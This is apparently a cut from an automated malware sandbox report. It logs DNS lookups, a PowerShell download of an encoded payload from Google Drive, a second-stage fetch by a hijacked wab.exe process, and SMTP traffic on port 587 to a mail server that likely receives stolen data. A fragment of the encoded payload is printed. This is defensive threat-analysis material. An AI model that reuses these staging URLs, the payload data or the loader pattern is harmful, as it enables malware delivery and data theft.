                                    Jul 3, 2024 08:46:29.837836027 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:29.838212013 CEST49710587192.168.2.7195.128.154.10
                                    Jul 3, 2024 08:46:29.843041897 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:30.030719042 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:30.031111956 CEST49710587192.168.2.7195.128.154.10
                                    Jul 3, 2024 08:46:30.035972118 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:30.278639078 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:30.279102087 CEST49710587192.168.2.7195.128.154.10
                                    Jul 3, 2024 08:46:30.284070969 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:30.470552921 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:30.470840931 CEST49710587192.168.2.7195.128.154.10
                                    Jul 3, 2024 08:46:30.476011992 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:30.807523012 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:30.809644938 CEST49710587192.168.2.7195.128.154.10
                                    Jul 3, 2024 08:46:30.814461946 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:31.001167059 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:31.001760006 CEST49710587192.168.2.7195.128.154.10
                                    Jul 3, 2024 08:46:31.001816988 CEST49710587192.168.2.7195.128.154.10
                                    Jul 3, 2024 08:46:31.001816988 CEST49710587192.168.2.7195.128.154.10
                                    Jul 3, 2024 08:46:31.001842976 CEST49710587192.168.2.7195.128.154.10
                                    Jul 3, 2024 08:46:31.006767988 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:31.006778955 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:31.006788015 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:31.006795883 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:31.704879045 CEST58749710195.128.154.10192.168.2.7
                                    Jul 3, 2024 08:46:31.763101101 CEST49710587192.168.2.7195.128.154.10
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 3, 2024 08:45:51.077524900 CEST5505753192.168.2.71.1.1.1
                                    Jul 3, 2024 08:45:51.084745884 CEST53550571.1.1.1192.168.2.7
                                    Jul 3, 2024 08:45:52.141928911 CEST6099353192.168.2.71.1.1.1
                                    Jul 3, 2024 08:45:52.149837017 CEST53609931.1.1.1192.168.2.7
                                    Jul 3, 2024 08:46:27.674520016 CEST5928553192.168.2.71.1.1.1
                                    Jul 3, 2024 08:46:27.699686050 CEST53592851.1.1.1192.168.2.7
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jul 3, 2024 08:45:51.077524900 CEST192.168.2.71.1.1.10x7166Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                    Jul 3, 2024 08:45:52.141928911 CEST192.168.2.71.1.1.10x1710Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                    Jul 3, 2024 08:46:27.674520016 CEST192.168.2.71.1.1.10x419eStandard query (0)mail.fiszebrandt.plA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jul 3, 2024 08:45:51.084745884 CEST1.1.1.1192.168.2.70x7166No error (0)drive.google.com142.250.185.174A (IP address)IN (0x0001)false
                                    Jul 3, 2024 08:45:52.149837017 CEST1.1.1.1192.168.2.70x1710No error (0)drive.usercontent.google.com142.250.74.193A (IP address)IN (0x0001)false
                                    Jul 3, 2024 08:46:27.699686050 CEST1.1.1.1192.168.2.70x419eNo error (0)mail.fiszebrandt.plfiszebrandt.plCNAME (Canonical name)IN (0x0001)false
                                    Jul 3, 2024 08:46:27.699686050 CEST1.1.1.1192.168.2.70x419eNo error (0)fiszebrandt.pl195.128.154.10A (IP address)IN (0x0001)false
                                    • drive.google.com
                                    • drive.usercontent.google.com
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.749706142.250.185.1744434704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-07-03 06:45:51 UTC215OUTGET /uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: drive.google.com
                                    Connection: Keep-Alive
                                    2024-07-03 06:45:52 UTC1598INHTTP/1.1 303 See Other
                                    Content-Type: application/binary
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Wed, 03 Jul 2024 06:45:51 GMT
                                    Location: https://drive.usercontent.google.com/download?id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd&export=download
                                    Strict-Transport-Security: max-age=31536000
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Content-Security-Policy: script-src 'nonce-gd9E5CeeF33bmpNY1Rs-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                    Cross-Origin-Opener-Policy: same-origin
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Server: ESF
                                    Content-Length: 0
                                    X-XSS-Protection: 0
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.749707142.250.74.1934434704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-07-03 06:45:52 UTC233OUTGET /download?id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd&export=download HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: drive.usercontent.google.com
                                    Connection: Keep-Alive
                                    2024-07-03 06:45:53 UTC4822INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Content-Security-Policy: sandbox
                                    Content-Security-Policy: default-src 'none'
                                    Content-Security-Policy: frame-ancestors 'none'
                                    X-Content-Security-Policy: sandbox
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Resource-Policy: same-site
                                    X-Content-Type-Options: nosniff
                                    Content-Disposition: attachment; filename="nonjudicatory.dwp"
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: false
                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                    Accept-Ranges: bytes
                                    Content-Length: 459376
                                    Last-Modified: Tue, 02 Jul 2024 08:28:54 GMT
                                    X-GUploader-UploadID: ACJd0NpZcQZBlHn65MHG7oI03aqcyrtZqGeGMUyFXXiCIXjbjI_Xc1qCATvAgLNM86SMCrqVkfc
                                    Date: Wed, 03 Jul 2024 06:45:53 GMT
                                    Expires: Wed, 03 Jul 2024 06:45:53 GMT
                                    Cache-Control: private, max-age=0
                                    X-Goog-Hash: crc32c=d/5qug==
                                    Server: UploadServer
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close
                                    2024-07-03 06:45:53 UTC4822INData Raw: 63 51 47 62 36 77 4c 78 38 4c 76 68 58 52 45 41 36 77 49 49 34 48 45 42 6d 77 4e 63 4a 41 54 72 41 76 71 4e 63 51 47 62 75 56 31 70 35 2f 72 72 41 6d 6f 47 63 51 47 62 67 66 48 56 72 6a 52 70 63 51 47 62 36 77 4b 70 74 6f 48 78 69 4d 66 54 6b 2b 73 43 53 62 35 78 41 5a 76 72 41 70 61 2f 36 77 4a 68 68 72 72 32 58 2b 78 38 63 51 47 62 63 51 47 62 36 77 49 43 76 2b 73 43 4f 71 34 78 79 75 73 43 70 4b 78 78 41 5a 75 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 6e 45 42 6d 2b 73 43 42 77 65 44 77 51 52 78 41 5a 74 78 41 5a 75 42 2b 64 2f 30 73 51 4a 38 7a 4f 73 43 33 66 68 78 41 5a 75 4c 52 43 51 45 36 77 4b 52 61 75 73 43 36 71 65 4a 77 2b 73 43 70 46 52 78 41 5a 75 42 77 36 33 67 72 77 42 78 41 5a 76 72 41 68 4b 68 75 6d 32 6f 71 67 56 78 41 5a 74 78 41 5a 75
                                    Data Ascii: cQGb6wLx8LvhXREA6wII4HEBmwNcJATrAvqNcQGbuV1p5/rrAmoGcQGbgfHVrjRpcQGb6wKptoHxiMfTk+sCSb5xAZvrApa/6wJhhrr2X+x8cQGbcQGb6wICv+sCOq4xyusCpKxxAZuJFAtxAZtxAZvR4nEBm+sCBweDwQRxAZtxAZuB+d/0sQJ8zOsC3fhxAZuLRCQE6wKRausC6qeJw+sCpFRxAZuBw63grwBxAZvrAhKhum2oqgVxAZtxAZu
                                    2024-07-03 06:45:53 UTC4822INData Raw: 47 52 31 31 39 2f 63 65 78 35 4e 49 4f 6c 31 6f 76 75 69 79 75 6d 48 54 78 4e 7a 70 63 7a 51 71 2f 74 59 4d 6b 69 70 56 42 71 30 41 4f 75 57 49 67 30 64 51 35 66 70 66 77 70 4a 7a 66 48 41 6d 4b 55 4b 69 56 34 68 67 67 56 77 45 71 67 62 41 2f 72 66 59 7a 42 42 58 38 76 49 6f 64 68 4c 39 63 63 33 6f 56 79 78 67 6f 46 4e 72 54 33 6e 35 77 69 5a 75 73 55 54 4a 54 68 55 41 76 50 53 4e 54 6d 74 53 32 35 52 48 52 79 4e 59 6d 53 35 73 48 66 33 34 63 55 61 68 77 4a 58 7a 61 72 45 6a 42 72 6f 4b 65 51 78 53 62 6e 4a 7a 41 64 64 64 35 30 77 38 57 70 4e 7a 6e 52 39 7a 6e 4e 35 65 33 52 38 47 30 72 34 61 47 58 6f 38 6c 47 46 59 6f 71 5a 77 58 31 53 6a 34 4d 4e 61 61 34 42 45 6a 71 55 47 41 2b 64 4b 39 74 41 30 35 77 37 73 58 52 34 2f 30 47 51 74 42 6a 7a 55 78 4f 37
                                    Data Ascii: GR119/cex5NIOl1ovuiyumHTxNzpczQq/tYMkipVBq0AOuWIg0dQ5fpfwpJzfHAmKUKiV4hggVwEqgbA/rfYzBBX8vIodhL9cc3oVyxgoFNrT3n5wiZusUTJThUAvPSNTmtS25RHRyNYmS5sHf34cUahwJXzarEjBroKeQxSbnJzAddd50w8WpNznR9znN5e3R8G0r4aGXo8lGFYoqZwX1Sj4MNaa4BEjqUGA+dK9tA05w7sXR4/0GQtBjzUxO7
                                    2024-07-03 06:45:53 UTC234INData Raw: 39 6e 62 4c 36 4c 54 44 46 4e 68 43 37 7a 70 33 4d 66 61 65 37 53 66 31 37 66 78 61 35 68 4a 39 71 35 55 49 56 55 30 35 53 4d 7a 38 7a 57 72 6e 6d 32 30 4f 46 56 46 69 79 53 4c 4e 59 73 6b 69 7a 57 4c 4a 49 73 31 69 79 53 4c 4e 59 67 70 30 76 63 79 76 77 71 34 6c 76 6d 52 74 37 72 74 66 71 4a 55 36 50 6a 62 49 56 59 79 62 6b 4d 75 46 4e 72 70 76 58 30 62 58 6d 79 44 4e 59 70 2b 63 79 2b 57 70 79 6b 79 55 66 4d 72 4b 35 55 6a 4d 4b 61 79 76 54 55 52 30 4f 77 32 6e 72 2b 4e 38 4e 76 68 31 46 68 7a 36 4a 70 45 7a 36 6d 41 78 62 62 41 68 54 55 35 48 67 44 2b 50 7a 34 52 58 42 31 65 58 33 58 67 69 79 43 4c 4e 69 73 4f 51 79 57 4a 43 5a 63 6c 74 2b 52 6b 2f 59 73 6b 69 7a 57 4c 4a 49 73 31 69 79 53
                                    Data Ascii: 9nbL6LTDFNhC7zp3Mfae7Sf17fxa5hJ9q5UIVU05SMz8zWrnm20OFVFiySLNYskizWLJIs1iySLNYgp0vcyvwq4lvmRt7rtfqJU6PjbIVYybkMuFNrpvX0bXmyDNYp+cy+WpykyUfMrK5UjMKayvTUR0Ow2nr+N8Nvh1Fhz6JpEz6mAxbbAhTU5HgD+Pz4RXB1eX3XgiyCLNisOQyWJCZclt+Rk/YskizWLJIs1iyS
                                    2024-07-03 06:45:53 UTC1321INData Raw: 4c 4e 59 73 6b 69 7a 57 49 6b 33 49 33 4f 71 53 35 4a 43 45 43 6e 6f 57 50 4a 49 73 4a 6a 2b 43 7a 4e 59 73 6b 69 7a 57 4c 4a 49 73 31 69 79 53 4c 4e 59 73 6b 69 7a 62 38 56 73 37 2b 6a 46 41 2b 57 6f 56 30 39 34 42 69 41 56 37 58 72 62 79 6d 72 30 50 66 33 47 77 70 61 70 76 4d 57 6e 70 33 69 53 65 37 4e 54 4b 58 34 6d 70 56 56 53 4f 55 72 36 42 73 33 54 4b 57 46 56 32 4f 68 51 44 32 45 44 55 68 59 64 4d 34 59 5a 43 77 4c 79 4e 5a 72 64 4a 49 4e 72 38 30 71 35 2f 73 57 43 77 72 4e 54 30 4f 70 6b 6b 6c 5a 43 6d 77 41 7a 51 42 66 2b 44 52 6a 75 74 4d 74 33 4d 64 32 71 54 76 48 58 32 35 39 54 46 62 74 75 4d 6d 64 35 71 50 4a 52 74 59 42 4b 61 70 49 4a 75 6d 36 6c 58 67 57 4e 58 61 55 7a 7a 48 35 6f 77 70 39 2b 6c 73 73 34 7a 34 68 79 72 44 41 6f 7a 71 6d 49
                                    Data Ascii: LNYskizWIk3I3OqS5JCECnoWPJIsJj+CzNYskizWLJIs1iySLNYskizb8Vs7+jFA+WoV094BiAV7Xrbymr0Pf3GwpapvMWnp3iSe7NTKX4mpVVSOUr6Bs3TKWFV2OhQD2EDUhYdM4YZCwLyNZrdJINr80q5/sWCwrNT0OpkklZCmwAzQBf+DRjutMt3Md2qTvHX259TFbtuMmd5qPJRtYBKapIJum6lXgWNXaUzzH5owp9+lss4z4hyrDAozqmI
                                    2024-07-03 06:45:53 UTC1390INData Raw: 32 6c 34 31 6a 79 53 49 6c 62 57 63 6d 7a 65 6d 4f 4c 6b 54 6e 75 53 50 4e 59 6b 4a 6e 69 53 4a 49 47 6a 5a 51 42 39 47 34 6c 55 6c 61 79 64 71 38 30 35 7a 62 6a 43 78 71 63 45 6a 54 7a 79 76 6b 76 30 79 54 6a 6d 52 48 37 5a 2b 2b 52 49 54 49 4c 46 44 6d 47 6c 58 63 72 6f 50 75 58 43 6a 43 44 4f 2f 77 65 37 74 32 67 34 65 38 64 31 5a 56 50 77 6c 4c 74 74 57 38 78 49 5a 36 71 70 55 42 68 71 50 53 42 63 4d 45 4b 67 6e 79 51 66 6c 56 6d 42 74 67 64 71 75 47 6f 66 6b 61 44 44 79 76 70 77 51 37 6e 70 30 73 68 4b 5a 38 54 4b 57 78 7a 6d 6a 4d 53 4e 56 70 49 38 36 72 54 4a 55 4a 44 2b 75 36 53 4d 33 77 33 50 31 2b 6e 76 35 41 77 63 52 5a 56 45 54 30 6e 4c 6f 67 58 70 59 63 4b 4d 2b 76 61 56 38 59 30 2b 5a 48 4f 70 67 30 76 7a 67 65 52 38 75 6d 65 52 35 45 53 4c
                                    Data Ascii: 2l41jySIlbWcmzemOLkTnuSPNYkJniSJIGjZQB9G4lUlaydq805zbjCxqcEjTzyvkv0yTjmRH7Z++RITILFDmGlXcroPuXCjCDO/we7t2g4e8d1ZVPwlLttW8xIZ6qpUBhqPSBcMEKgnyQflVmBtgdquGofkaDDyvpwQ7np0shKZ8TKWxzmjMSNVpI86rTJUJD+u6SM3w3P1+nv5AwcRZVET0nLogXpYcKM+vaV8Y0+ZHOpg0vzgeR8umeR5ESL
                                    2024-07-03 06:45:53 UTC1390INData Raw: 39 73 37 36 31 48 66 6e 70 30 34 64 46 72 42 54 49 33 35 6c 34 47 53 53 4e 56 5a 33 76 75 49 54 49 32 59 2f 72 6b 37 6d 4c 35 45 67 38 67 62 55 41 54 77 39 4c 56 73 58 62 6e 71 78 2b 51 72 42 6f 36 39 2b 44 77 74 39 78 51 43 4e 76 64 4a 75 4c 68 39 57 78 63 66 79 54 6e 2b 45 35 4e 62 4a 4d 7a 2f 39 64 73 76 72 64 6a 36 76 50 48 4d 6c 4f 4f 30 61 76 56 67 79 53 4c 43 35 74 66 6c 7a 47 4b 57 6f 7a 79 75 70 4f 46 52 4d 6e 48 72 63 4e 44 69 46 31 36 53 4e 71 7a 67 77 44 52 75 61 4f 76 78 4f 74 33 6e 36 74 58 62 67 46 36 66 59 6e 64 39 2b 45 4e 51 51 32 4d 70 30 78 63 67 4a 4c 36 72 72 31 55 74 70 66 72 6a 36 4a 71 4d 7a 64 73 74 30 59 47 31 39 51 78 4e 38 72 74 36 54 4a 50 4d 34 6b 2b 37 42 62 55 4f 53 66 57 39 70 78 72 72 34 32 6f 62 31 61 42 5a 4e 53 68 41
                                    Data Ascii: 9s761Hfnp04dFrBTI35l4GSSNVZ3vuITI2Y/rk7mL5Eg8gbUATw9LVsXbnqx+QrBo69+Dwt9xQCNvdJuLh9WxcfyTn+E5NbJMz/9dsvrdj6vPHMlOO0avVgySLC5tflzGKWozyupOFRMnHrcNDiF16SNqzgwDRuaOvxOt3n6tXbgF6fYnd9+ENQQ2Mp0xcgJL6rr1Utpfrj6JqMzdst0YG19QxN8rt6TJPM4k+7BbUOSfW9pxrr42ob1aBZNShA
                                    2024-07-03 06:45:53 UTC1390INData Raw: 35 35 73 74 49 30 4b 61 74 52 37 31 4d 6b 4b 6d 32 52 79 70 49 30 47 42 6e 6b 67 4a 4d 6b 49 67 33 75 54 78 41 4f 46 71 42 51 69 36 6c 46 38 53 65 43 30 42 35 31 50 72 67 76 6b 50 77 69 5a 48 30 6c 48 4e 47 78 49 67 41 69 39 4f 6b 35 54 59 32 70 49 4b 77 7a 4a 63 31 64 6d 79 73 4a 68 2b 6a 49 6a 75 6b 65 33 62 6a 50 73 6c 54 31 55 47 6a 4f 6a 41 70 7a 75 33 6a 44 6c 6a 70 4c 59 53 72 2b 6b 52 38 6e 37 63 61 71 6c 36 31 64 62 6f 6e 67 66 6e 67 78 6a 2f 57 49 37 63 62 44 72 74 70 56 74 63 42 2b 68 65 77 36 4b 6b 6b 39 51 56 2b 79 6a 30 67 61 38 74 69 79 53 33 4d 55 54 51 69 7a 57 4c 4a 49 73 31 69 79 53 4c 4e 59 73 6b 69 7a 57 4c 4a 49 68 43 53 42 45 4c 4b 5a 43 6c 78 69 72 50 64 2f 36 69 66 6f 72 48 7a 2f 39 75 4a 51 34 57 67 36 35 76 63 34 4b 55 35 37 45
                                    Data Ascii: 55stI0KatR71MkKm2RypI0GBnkgJMkIg3uTxAOFqBQi6lF8SeC0B51PrgvkPwiZH0lHNGxIgAi9Ok5TY2pIKwzJc1dmysJh+jIjuke3bjPslT1UGjOjApzu3jDljpLYSr+kR8n7caql61dbongfngxj/WI7cbDrtpVtcB+hew6Kkk9QV+yj0ga8tiyS3MUTQizWLJIs1iySLNYskizWLJIhCSBELKZClxirPd/6iforHz/9uJQ4Wg65vc4KU57E
                                    2024-07-03 06:45:53 UTC1390INData Raw: 57 58 69 51 4f 46 71 50 48 4b 70 47 36 77 39 64 6f 67 58 43 4d 45 5a 4e 30 63 49 51 61 4f 77 45 6f 70 51 7a 57 4c 47 72 39 33 42 7a 53 4b 53 42 45 7a 69 6c 75 50 39 42 6e 71 69 76 4b 75 63 32 38 73 62 69 79 5a 49 34 38 2b 59 78 53 64 4d 69 79 30 49 6e 69 74 41 4b 34 36 35 37 51 45 35 65 72 44 49 70 5a 46 69 41 58 4e 51 69 66 76 49 68 46 66 7a 49 38 74 4b 4a 5a 32 62 4a 46 6a 70 41 68 68 37 6e 74 6e 68 79 4f 52 79 53 4d 6e 39 37 6d 44 48 54 4a 48 77 46 2f 6d 65 53 4f 48 79 2b 6f 49 4c 6e 50 35 41 77 38 78 37 56 45 54 30 73 72 4d 4b 78 43 59 54 5a 77 76 4b 6d 42 35 64 51 68 38 68 30 52 4c 4c 7a 38 74 52 74 65 4a 51 56 68 37 74 36 77 37 6d 6c 71 37 58 79 66 4b 70 50 33 2f 63 73 31 71 53 37 64 70 74 45 4f 43 42 35 4a 6d 61 51 57 4c 4a 49 76 43 6c 49 44 44 4d
                                    Data Ascii: WXiQOFqPHKpG6w9dogXCMEZN0cIQaOwEopQzWLGr93BzSKSBEziluP9BnqivKuc28sbiyZI48+YxSdMiy0InitAK4657QE5erDIpZFiAXNQifvIhFfzI8tKJZ2bJFjpAhh7ntnhyORySMn97mDHTJHwF/meSOHy+oILnP5Aw8x7VET0srMKxCYTZwvKmB5dQh8h0RLLz8tRteJQVh7t6w7mlq7XyfKpP3/cs1qS7dptEOCB5JmaQWLJIvClIDDM
                                    2024-07-03 06:45:53 UTC1390INData Raw: 2f 48 37 6d 4c 47 44 31 41 63 73 6b 30 64 38 47 4f 69 69 75 6a 43 79 30 34 65 2b 6a 6a 44 7a 4e 73 33 44 36 72 30 31 55 62 66 76 44 78 51 4d 51 2b 67 43 54 7a 2f 57 34 54 79 44 33 43 4c 37 38 61 59 55 41 4e 4e 37 65 34 63 33 4d 55 79 75 35 42 67 70 49 47 6a 47 61 58 37 74 75 74 43 36 42 33 66 70 37 4c 74 73 52 38 55 5a 5a 35 50 69 64 75 68 67 6d 50 45 61 46 4f 7a 4a 65 2f 4c 7a 64 47 51 4f 4f 6e 4b 39 46 50 35 50 44 56 35 76 69 39 45 4e 62 75 6e 6c 47 4b 38 39 76 36 65 77 71 6e 6a 66 63 58 34 73 34 68 2b 6a 42 32 43 64 6b 52 72 67 44 45 4a 71 41 39 32 52 6e 49 65 47 4b 64 2b 38 41 4b 30 68 71 77 55 46 50 32 36 36 6d 41 66 70 36 64 62 51 7a 58 46 6b 79 56 4e 77 6a 2f 7a 45 6a 56 6c 2f 4a 56 75 6b 79 56 7a 66 64 39 59 4a 6d 2b 52 49 4c 49 47 6c 41 45 54 4f
                                    Data Ascii: /H7mLGD1Acsk0d8GOiiujCy04e+jjDzNs3D6r01UbfvDxQMQ+gCTz/W4TyD3CL78aYUANN7e4c3MUyu5BgpIGjGaX7tutC6B3fp7LtsR8UZZ5PiduhgmPEaFOzJe/LzdGQOOnK9FP5PDV5vi9ENbunlGK89v6ewqnjfcX4s4h+jB2CdkRrgDEJqA92RnIeGKd+8AK0hqwUFP266mAfp6dbQzXFkyVNwj/zEjVl/JVukyVzfd9YJm+RILIGlAETO
                                    2024-07-03 06:45:53 UTC1390INData Raw: 6d 48 6a 48 42 66 50 67 67 38 63 4b 78 30 56 2b 55 6f 36 47 74 5a 4b 54 46 62 74 4e 47 74 64 6c 38 75 4a 59 38 6b 69 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                    Data Ascii: mHjHBfPgg8cKx0V+Uo6GtZKTFbtNGtdl8uJY8kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.749708142.250.185.1744433736C:\Program Files (x86)\Windows Mail\wab.exe
                                    TimestampBytes transferredDirectionData
                                    2024-07-03 06:46:22 UTC216OUTGET /uc?export=download&id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: drive.google.com
                                    Cache-Control: no-cache
                                    2024-07-03 06:46:23 UTC1598INHTTP/1.1 303 See Other
                                    Content-Type: application/binary
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Wed, 03 Jul 2024 06:46:23 GMT
                                    Location: https://drive.usercontent.google.com/download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=download
                                    Strict-Transport-Security: max-age=31536000
                                    Cross-Origin-Opener-Policy: same-origin
                                    Content-Security-Policy: script-src 'nonce-BK_03Mojxk2LosvUwHc11A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Server: ESF
                                    Content-Length: 0
                                    X-XSS-Protection: 0
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.749709142.250.74.1934433736C:\Program Files (x86)\Windows Mail\wab.exe
                                    TimestampBytes transferredDirectionData
                                    2024-07-03 06:46:23 UTC258OUTGET /download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=download HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Cache-Control: no-cache
                                    Host: drive.usercontent.google.com
                                    Connection: Keep-Alive
                                    2024-07-03 06:46:25 UTC4826INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Content-Security-Policy: sandbox
                                    Content-Security-Policy: default-src 'none'
                                    Content-Security-Policy: frame-ancestors 'none'
                                    X-Content-Security-Policy: sandbox
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Resource-Policy: same-site
                                    X-Content-Type-Options: nosniff
                                    Content-Disposition: attachment; filename="OSeuefX165.bin"
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: false
